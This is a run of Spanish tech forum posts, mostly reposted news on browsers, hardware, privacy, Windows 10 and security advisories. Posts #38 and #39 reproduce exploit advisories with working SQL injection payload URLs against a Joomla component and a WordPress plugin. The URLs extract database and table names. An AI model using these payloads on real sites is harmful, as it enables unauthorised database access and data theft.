El tema de la privacidad y los datos cifrados se han convertido en una preocupación constante para la gran mayoría de la gente. Productos y servicios como el que ofrece el buscador DuckDuckGo se han visto beneficiados con este interesante giro y, honestamente, no es para menos.

De acuerdo a información publicada en NDTV Gadgets, desde las reveleaciones que filtró Edward Snowden de la NSA, el tráfico del buscador DuckDuckGo ha crecido 600% en dos años. Impresionante desde donde se le mire. Otros factores que han ayudado a posicionar a DuckDuckGo entre las preferencias de la gente, es que es uno de los buscadores que se incluyen en las opciones de iOS8, además de venir preinstalado en el navegador Firefox.

¿Y por qué DuckDuckGo y no Google u otro buscador? Porque desde sus inicios, la propuesta de esta compañía era mantener la privacidad de los usuarios y no quedarse con el historial de búsquedas. La publicidad que presentan, depende solamente de las palabras claves que tecleemos y no del historial.

A DuckDuckgo todavía le falta mucho camino para competirle como iguales a Google, pero mantienen esperanzas de seguir creciendo de forma constante en la medida que la gente se siga preocupando por la privacidad de sus datos.

Fuente: fayerwayer
#19
Descargar favicons de gran tamaño provoca que los navegadores se cierren de manera inesperada, un fallo que ya fue solucionado en Firefox.

Si de forzar el cierre de navegadores se trata, existen (o existían) métodos un tanto sencillos que cualquiera podía llevar a cabo, pero el último fue descubierto por un desarrollador de software, Andrea de Pasquale, quien compartió a través de Twitter una nueva manera de cerrar los navegadores Chrome y Safari, con información de Softpedia.



Los navegadores intentan descargar el favicon de una página web que pesa hasta 64MB, lo cual también es raro, pues en realidad se trataba de una copia de seguridad en formato TAR de toda la página web. El problema es que los navegadores no limitan el tamaño de un favicon y éstos proceden a descargarlo sin alguna verificación.

Después de esto, Benjamin Gruenbaum realizó sus propias pruebas en Chrome y Safari, reproduciendo el bug para abrir favicons de 10GB en ambos navegadores. Cualquiera que desee reproducirlo en su navegador en tres pasos puede revisar la documentación en Github, ya que es necesario descargar un archivo.

Este problema se presenta tanto en la versión de escritorio como en los navegadores para smartphones, es decir, debido a un bug con la descarga de favicons y touch-icon, respectivamente. Firefox también era susceptible a este fallo, hasta que hace poco recibió un parche para solucionarlo.

Probablemente este problema sea solucionado en los navegadores conforme Google y Apple liberen los parches necesarios, aunque es muy improbable que un usuario promedio se vea afectado por este problema.

Fuente: fayerwayer
#20
Porn Time te permite reproducir videos en alta calidad de forma gratuita usando torrent.

Hace un tiempo atrás nos enterábamos de la existencia de Porn Time, un proyecto de código abierto que funciona de la misma manera que Popcorn Time —usando el protocolo Torrent para reproducir videos que no están almacenados en ningún servidor en particular sino que colectivamente— pero dedicado a la pornografía.

Tras su lanzamiento para Windows, Mac OS X y Linux, finalmente Porn Time llega a Android. Uno debe descargar el APK desde el sitio web de Porn Time e instalarlo en su celular, para así acceder a muchos contenidos para adultos en 720p o 1080p.


El reproductor de la aplicación se comporta bastante bien, y es capaz de reproducir archivos MP4 que se estén descargando mediante torrent sin muchos problemas.


Por lo que parece, la "peor pesadilla de Hollywood" también lo será para la industria de la pornografía, consolidando algo que se comentó mucho cuando apareció y posteriormente cerró la primera versión de Popcorn Time:

Esto sólo marca el inicio de una tendencia, la de crear plataformas de código abierto para acceder a archivos torrent y reproducir sus contenidos antes de terminar de descargarlos.

Fuente: fayerwayer
#21
La versión para administradores del bloqueador de avisos publicitarios también llegará próximamente a Firefox.


El software para bloquear contenidos publicitarios en páginas web, Adblock Plus, anunció que con la actualización a su versión 1.9 para Chrome viene una nueva función que les permitirá a los administradores de redes bloquear colectivamente que el navegador cargue su primera página.

La empresa anunció que éste es el primer paso para poder implementar un proyecto que llaman Adblock Plus para administradores, y que consistiría en una herramienta para permitirle a los administradores descargar e instalar Adblock Plus en toda la red sin importar su tamaño.

Esto significa que próximamente el administrador de redes de una gran empresa podrá instalar masivamente la extensión de Chrome para bloquear avisos publicitarios, lo que reduciría el consumo de ancho de banda y evitaría la instalación de avisos publicitarios maliciosos. La empresa adelantó que está trabajando también en una versión para Firefox de su herramienta para administradores.


Fuente: fayerwayer
#22

Samsung HDD, una división adquirida en 2011 por Seagate, ha presentado el disco duro portátil con 4 TB más delgado y ligero del mundo.

Mientras Samsung sigue apostando por sus SSDs para impulsarlas a estándar de almacenamiento, su antigua división de discos duros vendida a Seagate en 2011, sigue comercializando productos como este, una solución portátil extremadamente delgada y ligera que se venderá en dos modelos M3 Portable y P3 Portable.

Usan un formato de 2,5 pulgadas y se conectan a puertos USB 3.0. Cuentan con variantes de hasta 4 Tbytes de capacidad de almacenamiento, pasando por 2 TB, 1 TB y 500 Gbytes en su modelo más pequeño.


Con tres años de garantía estarán disponibles a finales del mes de junio. No se han facilitado precios. Su destino es un usuario o profesional que necesite gran capacidad de almacenamiento para ampliar el de su ordenador portátil.

Fuente: Muycomputer
#23

La ensambladora MSI ha presentado su nueva GeForce GTX 980 Ti V1, tarjeta gráfica de gama alta basada en el núcleo GM200-310 que cuenta con un diseño similar al modelo de referencia pero con matices propios de MSI.

A nivel de especificaciones no hay sorpresas, lo que significa que la GeForce GTX 980 Ti V1 viene con las frecuencias del modelo de referencia, es decir, 1.000 MHz-1.076 MHz en la GPU, modo normal y turbo respectivamente, y 7 GHz en la memoria.

Sin embargo el diseño ha sido especialmente cuidado y el ventilador también ha sido personalizado por MSI, de forma que consigue una disipación más eficiente que el modelo de referencia.

Por lo demás mantiene las especificaciones base de toda GTX 980 TI que, os recordamos, son las siguientes:

-2.816 núcleos CUDA.
-172 unidades de textura.
-96 unidades de rasterizado.
-Bus de 384 bits.
-6 GB de memoria GDDR5.


Tened en cuenta que este tipo de tarjetas gráficas son matadoras para resoluciones inferiores a 2K, así que si vuestra intención es jugar en resoluciones 1080p deberíais considerar otras soluciones más adecuadas y asequibles, como por ejemplo las GTX 970 y las R9 290.


Si por contra tenéis pensado jugar en resoluciones 2K o 4K esta solución gráfica empieza a ser recomendable, junto a otras opciones como la nueva Radeon Fury X de AMD.

Fuente: TechPowerUP!
#24

Las agencias de inteligencia de Rusia y China han descifrado recientemente los ficheros filtrados por ex técnico de la CIA Edward Snowden, identificando a agentes secretos británicos y estadounidenses esparcidos por todo el mundo.

El MI6, servicio de inteligencia británico, ha decidido retirar sus agentes de operaciones que estaban llevando en países hostiles, según un informe en el cual se citan a oficiales británicos y a otros servicios de inteligencia occidentales, el cual contiene ciertas contradicciones, ya que por un lado se acusa a Edward Snowden de tener "las manos manchadas de sangre", a la vez que citaba que ningún agente había resultado herido hasta ahora. El Primer Ministro de Reino Unido, David Cameron, ha confirmado que esos ficheros están realmente en manos rusas y chinas.

El informe del MI6 cita a David Omand, ex director de Comunicaciones del Gobierno de la agencia de inteligencia del Reino Unido, diciendo que el material de Edward Snowden descifrado por China y Rusia resulta "un gran revés estratégico" y que está perjudicando a Reino Unido, Estados Unidos y sus aliados. Por su parte la polémica NSA ha decidido no hacer comentarios al respecto hasta el momento.

Edward Snowden sigue en Rusia, país que le ha concedido una residencia temporal por tres años, mientras que en Estados Unidos siguen las presiones con el fin de limitar el radio de acción de la NSA, obteniendo resultados.

Fuente: PCWorld
#25
He probado HoloLens y no quiero volver atrás: por fin la realidad aumentada es alucinante


Hace cinco años comencé a interesarme por la realidad aumentada y las posibilidades que ofrecía. Lo que empezó como curiosidad terminó siendo objeto de un embrión de tésis doctoral pero todo lo que veía y probaba me decepcionaba. No funcionaba del todo bien y la experiencia estaba muy lejos de donde querían llegar. Tras muchas pruebas y experimentos, Microsoft tiene todas las papeletas de ser la primera compañía en rozar la excelencia en la realidad aumentada y su nombre es HoloLens.
Si habéis seguido la actualidad del E3, sabréis que la demo que hicieron con Minecraft fue alucinante. Lo que vimos estaba preparado para que pudiéramos verlo en vídeo ya que de otra forma, si no tenemos las gafas, es imposible. Se veía increíble pero seguro que más de uno era escéptico sobre la calidad de las imágenes o el mapeo de nuestro punto de vista para mostrarnos todo de forma correcta. Lo que ha enseñado hasta ahora Microsoft no tiene ni trampa ni cartón. Lo he probado y solo deseo que ésta sea una tecnología de futuro. Os cuento mi experiencia.
La realidad aumentada que vas a querer probar
Cualquiera que nos viera por el E3 pensaría que estábamos haciendo cola para probar Halo 5. Desde fuera daba esa sensación pero sabía que íbamos a ver algo más. Estaba nervioso, sé que la demo iba de HoloLens pero no sabía muy bien cómo lo iban a integrar. Llega el momento, se abren las puertas, es nuestro turno. Pasamos a una sala preparada para dar la sensación de ser una especie de vestíbulo espacial. Nos sentamos, veo las gafas en una estantería. No son especialmente grandes pero sí dan la sensación de ser contundentes.
Mientras esperamos nuestro turno, la gente encargada de gestionar la demo nos pide que no hagamos fotos ni vídeo. Uno a uno nos van llamando y nos colocan las gafas. El cristal frontal es totalmente transparente y a pesar de llevar gafas de ver, encajan bien. Sin problemas. Son cómodas, algo pesadas pero en el rato que estuvimos con ella no fue frustrante

Por fin, la realidad aumentada es atractiva, fácil de usar y capaz de crear continuidad entre lo real y lo virtual.

En ese momento nos piden que sigamos un punto blanco. "¿De qué me está hablando?" pienso por un momento. No hay ningún punto blanco en ningún sitio. Espera, sí, con las gafas puestas aparece delante mía, flotando en el aire, un icono con la distancia a la que estoy alejado. Es como la interfaz de un videojuego pero en vez de manejar un avatar, soy yo el que se está moviendo.



¿Cómo funciona HoloLens? Delante de nuestros ojos tenemos una porción rectangular donde se superponen elementos virtuales sobre lo que vemos real delante de nuestros ojos. Si nos salimos del ángulo de visión de ese cuadrado no veremos nada pero la calibración es rápida y efectiva. Aunque nos movamos un poco y perdamos ángulo de visión, la experiencia es muy fluida y no se rompe la sensación de continuidad entre lo real y lo virtual.

Avanzamos, pasamos por una escotilla y vemos que, virtualmente, se abre y vemos un mundo que no existe: un campo con marines entrenando. Funciona bien, la integración es tan efectiva que dan ganas de asomarse y ahí nos damos cuenta de que el rectángulo en el que se proyecta todo es algo pequeño pero rápido aprendemos a movernos para no salirnos de esa zona de visión pero a la vez desplazarnos físicamente para apreciar lo virtual desde un ángulo diferente.


Pasamos a una mesa de reunión en la que se proyecta en nuestras HoloLens los enemigos a los que posteriormente vamos a hacer frente en Halo 5. Las gafas reconocen nuestra mirada y podemos dirigirla por la proyección para ir viendo detalles de los objetos. Por ejemplo. tenemos el render de una nave dando vueltas y podemos ir apuntando en varios sitios para obtener más información.

Microsoft no ha repetido el error de Natal

De nuevo, probamos a movernos, nos agachamos, giramos alrededor de la mesa para ver todo desde un ángulo diferente. La sensación no podía ser mejor, la vista no se cansa, las imágenes tienen muy buena resolución y lo más importante: todo queda fundido a la perfección. Por un momento nos olvidamos de que llevamos un aparato en la cabeza, algo curioso si tenemos en cuenta de que aunque no es muy pesado, el cristal que tenemos delante de nuestros ojos es gordo.


Microsoft no ha querido cometer el error que tuvo en su día con Project Natal, más tarde conocido como Kinect. Lo que nos ha enseñado es lo que hay, sin trucos y eso hace que HoloLens sea un proyecto todavía más atractivo. La demo se me hizo muy corta y sé que pasará tiempo hasta que no vuelva a mis ojos pero si esto, y lo que hemos visto en vídeos, es el futuro: lo quiero ya.

Por supuesto, no todo el monte es orégano y hay algunas cosas en las que debe mejorar: las gafas siguen siendo un poco toscas y de cara al gran público puede ser una cortapisa. Son inalámbricas, algo que se agradece, pero no sabemos si la batería nos ofrecerá bastantes horas de autonomía. La zona de visión es algo pequeña en comparación con lo que vemos en un casco de realidad virtual. Ser un poco más amplio no le vendría mal y todo apunta a que hará falta un ordenador muy potente para hacerlas funcionar.

Todavía tiene para seguir creciendo y que se desarrolle contenido. A pesar de estar todavía en desarrollo, el hardware está muy maduro, tanto como las soluciones de realidad virtual que hemos visto en este E3. Ahora, de nuevo, solo falta que el contenido acompañe pero HoloLens ha sido, sin duda, de las cinco cosas más interesantes que he visto en la feria.

Fuente: xataka
#26

Corea del Norte es uno de los enemigos naturales de Estados Unidos, pero también uno de los países más herméticos del mundo, un detalle que precisamente les ayudó a salir airosos de un ataque con un gusano informático que recibieron hace cinco años.

Dicho gusano había sido desarrollado por el mismo equipo responsable del conocido Stuxnet, que como recordará más de uno de nuestros lectores sirvió para infectar instalaciones nucleares en Irán, basadas en sistemas de control Siemens.

Entre las capacidades de este gusano destacan la de reprogramar los controladores lógicos programables y ocultar los cambios realizados, de forma que el usuario no sea capaz de identificar fácilmente su presencia en el sistema, y en esta variante dirigida contra Corea del Norte era capaz de identificar sistemas informáticos basados en el idioma de dicho país.

Toda una herramienta de guerra cibernética que, sin embargo, no pudo cumplir su objetivo y no consiguió afectar al programa núclear norcoreano, ya que sus instalaciones y sistemas nucleares están cerrados "a cal y canto".

Como anticipamos el hermetismo del estado norcoreano jugó a su favor en esta ocasión librándolos de un ataque perfectamente planeado que podría hacer incrementado las tensiones entre ambos países.

Fuente: muycomputer
#27

Computex 2015. La firma taiwanesa Elitegroup Computer Systems ha presentado un desarrollo basado en el concepto y hardware del mini-PC formato pendrive Intel Compute Stick.

ECS fabrica productos que se venden bajo las marcas de otras compañías o diseña productos propios como éste claramente inspirado en el de Intel aunque con un envoltorio distinto y con un pequeño ventilador para evitar el sobrecalentamiento.

Como el Intel Compute Stick cuenta con un procesador Intel Bay Trail modelo Atom Z3735F con cuatro núcleos, 2 Gbytes de RAM, 32 Gbytes para almacenamiento, un conector HDMI, un puerto USB 2.0, puerto micro USB 2.0 (para alimentación), un lector de tarjetas microSD, Wi-Fi 802.11b / g / n y Bluetooth 4.0.

ECS dice que el mini-PC es compatible con Windows 8.1 con Bing y que será actualizado a Windows 10 cuando esté disponible. También debe apoyar Ubuntu y posiblemente otros sistemas operativos basados ​​en Linux.


No hay precio ni disponibilidad de este PC-on-a-stick que veremos en la feria de Taiwán. Hay bastantes empresas que tienen en el mercado desarrollos similares como Mele, MeegoPad, Epsen, Beelink y Hanspree. Su concepto y objetivo es el mismo. Lo conectas a un puerto HDMI de una pantalla como televisor o monitor para convertirlo en un ordenador funcional.

Tenemos entre manos un Intel Compute Stick y prometemos publica un completo análisis en próximas fechas. Dispositivos interesantes para usuarios o profesionales que requieran una computadora básica que puedan llevar en un bolsillo y conectar en cualquier pantalla de visualización con entrada HDMI.

Fuente: muycomputer
#28

Los discos duros de estado sólido o SSD son unos de los elementos tecnológicos más útiles que más sufren el factor precio, casi tanto como el cable HDMI más caro del mundo. La diferencia es que los discos duros SSD con cada vez más codiciados, y en la mayoría de los casos, lo valen.

Ahora, Intel y Micron han decidido hacer algo al respecto, y según parece el mercado de los discos duros va a cambiar radicalmente. Las compañías han anunciado que para 2016 ya tendremos en el mercado los SSD de 10 TB, y aunque no será lo que se dice barato, sí que tendrá un precio bastante menos desproporcionado de lo que cabría esperar.

¿Cómo lo conseguirán? Al parecer, este cambio será posible gracias a la tecnología NAND 3D, que permitirá a los discos duros SSD almacenar más datos, con menor proporción GB/euros. De hecho, se podrán almacenar hasta el triple de datos en el mismo espacio.

Los mejores discos duros SSD
Así se aumenta la densidad de almacenamiento, permitiendo que en el SSD del tamaño de un chicle (americano, plano y rectangular) entren aproximadamente 3,5 TB. ¿Qué implica esto? pues que en el tamaño de memoria SSD que estamos utilizando ahora entrarán 10 TB de almacenamiento.

Todo esto se consigue colocando las células de almacenamiento en una arquitectura vertical. Suena sencillo, pero lo cierto es que hacer este tipo de montaje ha requerido una precisión que, hasta ahora, no podíamos conseguir. Así se reducen el coste no sólo de la producción, sino también del mantenimiento: los nuevos discos duros SSD de 10 TB consumirán mucho menos.

Para que os quede más claro, echad un vistazo al vídeo de Micron en la que explican la tecnología 3D NAND. Esperemos que no sea una de esas noticias que caen en saco roto.

Fuente: computerhoy
#29

Ingenieros informáticos advierten que en ocho años Internet podría colapsar a causa del sobrecargo de las fibras ópticas y el crecimiento de la demanda de una navegación más rápida.

Dado que cada vez está creciendo la demanda de fibras ópticas, se transmitirá mayor cantidad de información de una manera más rápida, y precisamente ahí surge el riesgo de que Internet pronto pueda colapsar, informa 'Daily Mail'.

Aunque las compañías siempre podrán trazar nuevos cables para no sobrecargar solo una fibra óptica, esa medida conlleva grandes gastos complementarios y contribuye al alza de los precios de los servicios de conexión a Internet.

"Si no encontramos algunas ideas radicales para solucionar el problema nos arriesgamos a enfrentarnos al crecimiento dramático de los precios de los servicios de Internet", opina al respecto el profesor Andrew Ellis de la Universidad de Birmingham (Reino Unido).

Se prevé que el próximo 11 de mayo los principales ingenieros informáticos, físicos y compañías de telecomunicaciones se reúnan en la sede de la Real Sociedad de Londres (Reino Unido) para tratar dicho problema, según el portal de la sociedad científica.

Fuente: actualidad.rt (Esta Noticia es vieja, pero la considero muy importante, y nadie la ha publicado...)
#30

Microsoft acaba de anunciar, en su blog oficial, la fecha de lanzamiento y las principales características de Windows 10.

Será el 29 de julio cuando los usuarios de  Windows 7 o Windows 8 podrán descargar Windows 10 por medio de una actualización gratuita. Desde hoy mismo todos los usuarios de estos sistemas están recibiendo una notificación para reservar Windows 10.

El nuevo SO espera llegar a 1500 millones de usuarios en 190 países. En los últimos meses han estado trabajando duro para corregir fallos y añadir mejoras, gracias a las aportaciones de cuatro millones de usuarios que han probado la versión Preview de Windows 10.

Windows 10 pretende ser el sistema operativo más seguro de Microsoft. También será el que esté presente en más dispositivos diferentes: PCs, tablets, smartphones, Internet de las Cosas, Surface Hub, consola Xbox One y las gafas de realidad aumentada Microsoft HoloLens.

La compañía de Satya Nadella ha aprovechado la ocasión para mostrarnos las novedades más relevantes del esperado nuevo sistema operativo. También ha publicado dos nuevos vídeos que repasan las características del SO.

Este es el vídeo del lanzamiento de Windows 10:



Fuente: computerhoy
#31
En su evento I/O este jueves, la firma también anunció el del lanzamiento de Androd M, el nuevo sistema operativo para móviles.


A más de uno le gustaría poder usar los mapas de Google cuando viaja al extranjero, aunque no tenga internet. También volver a ver un vídeo en YouTube sin gastar datos o simplemente navegar por Chrome. Estos usuarios están de enhorabuena, porque el gigante tecnológico ha anunciado durante su conferencia I/O 2015 que todos estos servicios dispondrán de una versión offline en la próxima versión de su sistema operativo, Android M.

En el caso de Google Maps la versión offline llegará en los próximos meses al mercado estadounidense. Será exactamente igual que la aplicación normal y con las mismas funciones, aunque de momento no se podrán descargar mapas. Se deduce de ello que funcionará de forma similar a otras apps capaces de mostrar mapas y direcciones sin conexión a internet.


YouTube por fin dejará descargar vídeos y almacenarlos en el smartphone durante 48 horas para verlos cuando queramos. Una opción ideal para aquellos usuarios que no deseen gastar datos en ver vídeos, o no tengan suficiente conexión para ello. De forma similar, el navegador Chrome permitirá acceder a resutados de búsquedas sin conexión.

Estos servicios llegarán próximamente a Android M y no en todo el mundo, pero es de suponer que terminarán por llegar a todos los mercados y dispositivos. La idea de Google es que sus productos funcionen mejor en aquellos países con una mala conexión de internet, por ejemplo logrando que las páginas carguen pocas imágenes.

Fuente: elconfidencial
#32
Las suites ofimáticas de código abierto, LibreOffice y OpenOffice, se han actualizado recientemente para corregir una vulnerabilidad de ejecución remota de código.



Apache OpenOffice y LibreOffice son suites ofimáticas de código abierto y gratuitas. Ambas cuentan con aplicaciones de hojas de cálculo (Calc), procesador de textos (Writer), bases de datos (Base), presentaciones (Impress), gráficos vectorial (Draw), y creación y edición de fórmulas matemáticas (Math).


La vulnerabilidad (con CVE-2015-1774) afecta a documentos HWP, y está causada por un desbordamiento de búfer en el tratamiento del filtro HWP. Este problema podría permitir realizar denegaciones de servicio y lograr ejecutar código arbitrario a través de documentos HWP especialmente manipulados. Se ven afectadas todas las versiones de OpenOffice (versiones 4.1.1 y anteriores) y Libreoffice (versiones anteriores a 4.3.7/4.4.2).

La extensión HWP hace referencia a un tipo concreto de documentos creados con el procesador de textos coreano Hangul Word Processor, con capacidad de escribir y guardar documentos en el idioma coreano. Esto podría limitar las posibilidades de ataques fuera de este país, pero bien por desconocimiento o por un uso de la ingeniería social un atacante podría conseguir que alguien llegue a abrir un archivo malicioso.

Para corregir estas vulnerabilidades, se han publicado Apache OpenOffice 4.1.1, y LibreOffice 4.3.7/4.4.2 que se encuentran disponibles para su descarga desde las páginas oficiales:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Más información:

CVE-2015-1774 Out of bounds write in HWP file filter
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

OpenOffice HWP Filter Remote Code Execution and Denial of Service Vulnerability
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: unaaldia.hispasec
#33

Si has intentado acceder a Instagram desde tu ordenador o la versión web, te habrás encontrado con una advertencia de tu navegador web. El certificado SSL de la página web ha caducado, por lo que la comunicación cifrada con los servidores de Instagram sobre la capa HTTPS no se puede llevar a cabo. De esta forma, por un descuido, la compañía de Mark Zuckerberg ha ocasionado una vulnerabilidad de seguridad.

Según la advertencia de cualquier navegador que utilicemos, como es el caso de Google Chrome, Mozilla Firefox o incluso el nuevo Microsoft Edge, acceder ahora mismo a Instagram supone un "grave riesgo". Si accedemos a la información de seguridad de la conexión podremos comprobar que el certificado SSL de Instagram ha caducado, por lo que la comunicación cifrada con los servidores es problemática.

El navegador web alerta de que "la comunicación puede ser interceptada" cuando accedemos a Instagram.
La versión para dispositivos móviles está funcionando sin mostrar problemas, mientras que la versión para escritorio, o a través de navegador web, devuelve una advertencia que alerta sobre la vulnerabilidad a la que nos exponemos al conectar con los servidores de Instagram. Como podréis ver a continuación, el certificado SSL de Instagram caducaba hace tan solo algunos minutos, sin haber sido renovado aún por la compañía de Mark Zuckerberg.


¿Existen riesgos para los usuarios de Instagram?


La carencia de un certificado válido provoca que no se lleve a cabo una de las fases básicas de SSL, que consiste en el intercambio de claves públicas y autenticación. Ahora bien, podemos continuar utilizando el certificado caducado de Instagram siguiendo las instrucciones de nuestro navegador web. Si hacemos esto, no obstante, mantendremos con los servidores de Instagram una conexión con TLS 1.2. Por lo tanto, a pesar del fallo de Instagram, se mantiene el cifrado AES 128 e intercambio seguro de claves con RSA.

Fuente: adslzone
#34
Según AdWeek, Facebook está probando una nueva función que pregunta a los usuarios de qué amigos y páginas quieren ver contenido, para mostrar esa información primero.


Facebook te dejará elegir de qué personas y páginas quieres ver información, y de cuáles no.

La red social más grande del mundo está probando una nueva función que por ahora es conocida como "See more of what you love" (ver más de lo que te gusta, en español) y permite a los usuarios elegir la información que quieren ver primero al momento de ingresar a Facebook.

Según lo que muestra la revista AdWeek, Facebook está probando esto de forma gradual, y sólo algunos usuarios tienen acceso a la función y al parecer está presente sólo en el app móvil de Facebook.

Para comenzar a hacer uso de esta función, Facebook muestra un encabezado preguntando al usuario si desea iniciar la configuración de la herramienta o hacerlo en otro momento. Si se desea continuar, Facebook muestra una ventana completa pidiendo al usuario que elija las personas y páginas de las que quiere recibir más información.
Facebook confirmó a AdWeek esta función, aunque no la describió.

Las compañías constantemente están probando funciones para saber si les gustan a los usuarios y en un futuro cercano lanzar la función para todos sus usuarios. Anterior a esta prueba beta, la única opción de estar siempre al pendiente de tus amigos o personas más cercanas, así como de tus páginas favoritas, era recibiendo notificaciones cada vez que tus amigos publicaban algo.

Fuente: cnet
#35
Voy a dejar estos dos documentos por acá y me voy a retirar muy lentamente...

El que desee leerlo tiene total libertad de hacerlo...


The Vulnerability of UAVs to CyberAttacks - An Approach to the Risk Assessment
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Cyber Attack Vulnerabilities Analysis for Unmanned Aerial Vehicles
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#36
Acabas de formatear tu pc e instalaste Windows, tu pregunta es: Que programa le instalo a continuación? Muy fácil entras a la web de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y seleccionas los programas que deseas instalar y automaticamente se descargan e instalan.


Luego de seleccionar tus programas le das a donde dice "Get Installer" y descarga un archivo.exe el dual debes ejecutar como administrador y aparecerá lo siguiente:


Está descargando e instalado los programas que seleccionaste! Así de sensillo...

Lo bueno de esa web es que te baja todo junto y todas las últimas versiones de cada software que allas seleccionado!


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#37
Windows / Parkdale Speed Test
Abril 06, 2015, 12:20:04 AM
Una breve y simple descripción lo que hace este Software te permite obtener una lectura y escritura rápida desde sus discos duros, dispositivos cdrom y servidores de red en kilobytes, megabytes o incluso Gigabyte por segundo.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#38
Código: php
##################################################################################################
#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : http://demo.web-dorado.com/spider-random-article.html
#Date          : 22/03/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters
and hence affected by SQL injection vulnerability

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to catID and Itemid parameter


////////////////
///  POC   ////
///////////////


SQL Injection in catID parameter
=================================

Use error based double query injection with catID parameter

Injected Link--->

Like error based double query injection for exploiting username --->
http://server/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13


SQL Injection in Itemid parameter
=================================

Itemid Parameter is exploitable using xpath injection
 
http://server/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -

###################################################################################################
#39
Código: php
##################################################################################################
#Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : https://www.wpbusinessintelligence.com
#Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip
#Date          : 1/04/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

Wordpress plugin "Business Intelligence" is not filtering data in GET parameter  ' t ', which in is file 'view.php'
and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place.



///////////////////////////////
// Vulnerability Description: /
///////////////////////////////

vulnerability is due to parameter " t " in file 'view.php'.
user can inject sql query using GET parameter 't'


////////////////
///  POC   ////
///////////////


POC Image URL--->
=================
http://tinypic.com/view.php?pic=r8dyl0&s=8#.VRrvcuHRvIU


SQL Injection in parameter 't' (file 'view.php'):
=================================================

Injectable Link--->    http://server/wp-content/plugins/wp-business-intelligence/view.php?t=1

Union based SQL injection exist in the parameter which can be exploited as follows:


Payload used in Exploitation for Database name --->

http://server/wp-content/plugins/wp-business-intelligence/view.php
?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+


###
EDB Note: PoC might need work depending on version of plugin.
The provided software link is for the lite version.
Tested with following PoC:
wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=1
wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=2
###


###################################################################################################
#40
Movistar triplicará la velocidad a todos sus clientes de fibra alcanzando los 300 megas


Según ha podido saber ADSLZone, Movistar triplicará la velocidad de su oferta de fibra óptica en sus dos modalidades. Los clientes con 10 megabits pasarán a tener 30 megas mientras que los abonados con 100 megabits pasarán a tener 300 megas. La operadora se convertirá así en la primera compañía de telecos de España y de Europa en comercializar 300 mbps a clientes residenciales.

Se avecinan cambios importantes en las ofertas de banda ancha ultrarrápida de la operadora presidida por César Alierta. Tras confirmar el pasado mes de febrero que todos los clientes de ADSL dispondrían de la máxima velocidad que soportara su línea, ahora llegan los cambios en las ofertas de fibra óptica. En pocas semanas, los clientes con 10 megabits pasarán a tener 30 megas de bajada y 3 de subida mientras que los abonados con 100 megabits subirán hasta 300 de bajada y 30 megabits de subida. La migración de velocidad será gratuita sin necesidad de que el cliente deba llamar a la compañía para solicitar la mejora de su línea. Simplemente será necesario apagar y encender el router una vez que el cambio se haya efectuado.

Este movimiento iría acompañado del compromiso de la compañía con todos sus clientes de ADSL y VDSL de que serán migrados a fibra óptica sin coste en cuanto esta nueva red esté disponible en sus localidades. Recordamos que la operadora mantiene su compromiso de alcanzar 14 millones de hogares en cobertura este mismo año a pesar de los cambios regulatorios.

Nuevos precios

Aunque la triplicación de velocidad será gratuita, hace semanas que la operadora ha modificado el precio de su oferta de fibra en su página web. Actualmente los 100 megas tienen un precio de 38 euros mientras que la tarifa anterior vigente hasta el próximo 7 de abril era de 36,1 euros al mes IVA incluido. Aquellos clientes que necesiten cambiar el router y la ONT para poder soportar la nueva velocidad recibirán los equipos de forma gratuita. Según estimaciones de la compañía a las que hemos tenido acceso, el coste de esta migración podría alcanzar los 70 euros por hogar.

Cambios en Movistar Fusión

La operadora también está preparando una batería de cambios en su oferta convergente para reforzar su posición. Además de la triplicación de velocidad en las ofertas de fibra, Luis Miguel Gilpérez, Presidente de la compañía en España, adelantó que llegarían nuevos servicios en junio durante la presentación de la nueva temporada de Motociclismo. Según ha podido saber este medio, las mejoras irán acompañadas de una ligera subida en el precio de las ofertas que podría rondar los 5 euros al mes. Actualmente, la operadora cuenta con más de 3,7 millones de clientes de  "Fusión" y 1,4 millones de líneas móviles adicionales en su oferta convergente.

En resumen, la velocidad de la banda ancha vuelve a dispararse en España situando a nuestro país entre los más rápidos de la Unión Europea. A continuación encontrarás una tabla resumen con las diferentes velocidades disponibles en el mercado.

Fuente: adslzone